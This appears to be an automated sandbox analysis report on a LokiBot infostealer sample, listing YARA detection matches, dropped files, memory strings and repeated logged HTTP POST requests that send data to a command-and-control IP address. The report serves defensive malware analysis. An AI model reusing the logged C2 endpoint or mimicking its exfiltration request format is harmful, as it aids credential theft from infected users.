Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75
Source: unknown	TCP traffic detected without corresponding DNS query: 136.244.109.75

Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe

Code function: 12_2_00404ED4 recv,

12_2_00404ED4

Source: unknown

HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 180Connection: close

Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp, gunzipped.exe, 00000007.00000002.3213971046.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://136.244.109.75/index.php/1748937
Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://136.244.109.75/index.php/comments/feed/
Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://136.244.109.75/index.php/feed/
Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://136.244.109.75/index.php/wp-json/
Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gmpg.org/xfn/11
Source: gunzipped.exe, 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, WiHDtnb.exe, 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WiHDtnb.exe, WiHDtnb.exe, 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.w.org/

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: gunzipped.exe PID: 6400, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: WiHDtnb.exe PID: 3220, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: WiHDtnb.exe PID: 6148, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

.NET source code contains very large array initializations

Source: gunzipped.exe, ArffAttribute.cs	Large array initialization: : array initializer size 467652
Source: 0.2.gunzipped.exe.5110000.5.raw.unpack, .cs	Large array initialization: : array initializer size 13798
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, .cs	Large array initialization: : array initializer size 13798
Source: 9.2.WiHDtnb.exe.2c6d1d4.0.raw.unpack, .cs	Large array initialization: : array initializer size 13798

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_0251E030	0_2_0251E030
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_052FC748	0_2_052FC748
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_052F4598	0_2_052F4598
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_052F4E08	0_2_052F4E08
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_052F6EE0	0_2_052F6EE0
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_052F49C0	0_2_052F49C0
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_052F49D0	0_2_052F49D0
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_052F5230	0_2_052F5230
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_052F5240	0_2_052F5240
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_0131E030	9_2_0131E030
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_0632B860	9_2_0632B860
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_06324E08	9_2_06324E08
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_06326EE0	9_2_06326EE0
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_063217F0	9_2_063217F0
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_0632456A	9_2_0632456A
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_06324598	9_2_06324598
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_06325230	9_2_06325230
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_06325240	9_2_06325240
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_06320918	9_2_06320918
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_063249D0	9_2_063249D0
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_063249C0	9_2_063249C0
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 12_2_0040549C	12_2_0040549C
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 12_2_004029D4	12_2_004029D4

Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: String function: 00405B6F appears 42 times

Source: gunzipped.exe, 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs gunzipped.exe
Source: gunzipped.exe, 00000000.00000002.1996175319.0000000005110000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs gunzipped.exe
Source: gunzipped.exe, 00000000.00000002.1994339680.00000000039C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs gunzipped.exe
Source: gunzipped.exe, 00000000.00000002.1994339680.0000000003968000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs gunzipped.exe
Source: gunzipped.exe, 00000000.00000002.1997330585.0000000005CC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs gunzipped.exe
Source: gunzipped.exe, 00000000.00000002.1992453854.000000000098E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs gunzipped.exe
Source: gunzipped.exe	Binary or memory string: OriginalFilenameEnYo.exeX vs gunzipped.exe

Source: gunzipped.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
